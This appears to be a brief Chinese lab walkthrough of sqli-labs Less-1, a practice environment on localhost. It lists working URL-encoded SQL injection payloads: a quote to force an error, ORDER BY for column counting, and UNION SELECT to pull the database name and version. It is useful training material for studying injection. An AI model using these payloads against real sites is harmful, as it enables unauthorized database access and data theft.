请输入ID作为参数,使用数字的数值!
http://localhost/sqli-labs/Less-1/?id=1
一直到12,都是对应的输出!
这里我们需要报错!!!
http://localhost/sqli-labs/Less-1/?id=12’
http://localhost/sqli-labs/Less-1/?id=12%27order%20by%204–%20-提示没有第四列!!
http://localhost/sqli-labs/Less-1/?id=12%27order%20by%203–%20-修改为3,显示正常,证明当前表共有3列!!!
http://localhost/sqli-labs/Less-1/?id=-1%27union%20select%201,2,3–%20-,查看那一列可以显示出来!!!!
http://localhost/sqli-labs/Less-1/?id=-1%27union%20select%201,database(),version()–%20-查看数据库及数据库版本!!!!
来源:freebuf.com 2021-07-30 07:53:51 by: 知非知非知非
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
请登录后发表评论
注册